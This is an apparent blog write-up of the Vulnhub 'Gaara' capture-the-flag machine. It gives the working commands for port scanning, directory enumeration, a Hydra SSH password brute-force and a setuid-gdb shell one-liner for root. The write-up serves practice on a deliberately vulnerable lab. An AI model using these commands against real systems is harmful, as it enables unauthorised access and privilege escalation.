# Gaara 1: BOOT2ROOT CTF VULNHUB WRITEUP Hello everyone! Welcome to my second Capture-the-Flag writeup. My first one was on **PWN THE TRON**, a great machine for practicing. If you’re interested, you can check it out [here](https://medium.com/@kura1yum3/pwn-the-tron-boot2root-ctf-vulnhub-590974e79c9d). Now, let’s dive into a new challenge**, Gaara** from Vulnhub. Based on what I’ve gathered, this is an easy machine to tackle. Let’s get started! 1. **Reconnaissance** Let’s determine the IP of our target first:

Now that we know, let’s use **Nmap** to scan the target’s network and identify any open ports that could serve as potential entry points. *`nmap -A -sV -p- -T4 -v 192.168.43.140`*

As you can see here, the open ports are 22 which is ssh and 80 which is http

**2. Enumeration** Let’s take a quick look at the interface of our target

It’s time for us to enumerate all the subdirectories of our target, focusing on those that may contain valuable information, vulnerabilities, or hidden resources. These could serve as potential entry points for further exploitation, whether it’s sensitive data, misconfigurations, or access points we can leverage to gain deeper access into the system. We’ll use **Gobuster** for this. *`gobuster dir -u http://192.168.43.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 64`*

As you can see, I’ve completed the enumeration of the subdirectories, and one directory, **/Cryoserver**, caught my attention. At first, I thought it was of no value, but I found out that I can actually scroll down, at the very bottom, I noticed three additional subdirectories hidden there.

I dug through all of them, and it’s just some wiki-style storyline crap. What’s interesting is that the storyline is the same across all the directories. There’s definitely something hidden here, I just needed to dig deeper. After carefully analyzing the storyline in iamGaara, I found this string:

I came across a string that seemed to be encoded, so I launched my own Decoder Tool, Kudo! Kudo uses a unique decoding scheme for base encodings. If you’re curious, you can check out my tool [here](https://github.com/Kuraiyume/Kudo). I went through all the base encodings and discovered that the string was encoded in base58.

**3. Exploitation** The plaintext reveals **gaara:ismyname,** which is a clear indication that **gaara** is a user. Now that we have the username, we can brute-force our way in! Remember, when we scanned the target’s network, we saw that SSH was open, so we’ll use SSH to gain access to the system. Hydra will be our tool of choice for this attack. *`hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.43.140 ssh -t 64 -VVV`*

The password for user **gaara** is **iloveyou2**

Now that we have the login credential, it’s time for us to login through SSH as user **gaara.** *`ssh gaara@192.168.43.140`*

We’re in!!! And got the user Flag!! As you noticed, there’s another file, the **Kazekage.txt.** I took a look at that file and this is the content:

Probably a base64 encoded right? So I decode it using our target’s machine *`echo “base64-encoded-string” | base64 -d`*

The plaintext points to **games** directory. I navigated to it and discovered a .txt file there. Here’s the content of the file:

The file contains a BrainFuck encoded string, which we can easily decode using this [decoder](https://www.dcode.fr/brainfuck-language?__r=1.f95d2f0e7f432adeee396efdb886f6e5) here.

The result is: You think you could find something that easily? Try harder!

**4. Privilege Escalation** I guess we need to dig deeper here, so I searches the entire filesystem for regular files with the setuid bit set, which allows them to execute with the owner’s privileges (often root). *`find / -type f -perm -04000 2>/dev/null`*

As you can see here these are the directories that we can execute and **gdb** is included! We can use **gdb** to get root privilege so take a look at the gtfobins for gdb priv escalations, and this is the exploit: *`gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit`* This technique utilizes a debugger to spawn a new shell with elevated privileges and then exits the debugger. It’s commonly used for privilege escalation by gaining access to a shell with root-level permissions.

It works!!!! We have the root user!! This is the Final Flag:

We’ve successfully completed Gaara!! **Conclusion** Gaara is an easy machine to tackle, but it still requires players to analyze carefully. While it may seem straightforward, it challenges users to think critically and explore different techniques, such as encoding, file analysis, and privilege escalation. The machine reinforces the importance of attention to detail and persistence in uncovering hidden vulnerabilities, making it a great learning experience for those looking to sharpen their hacking skills.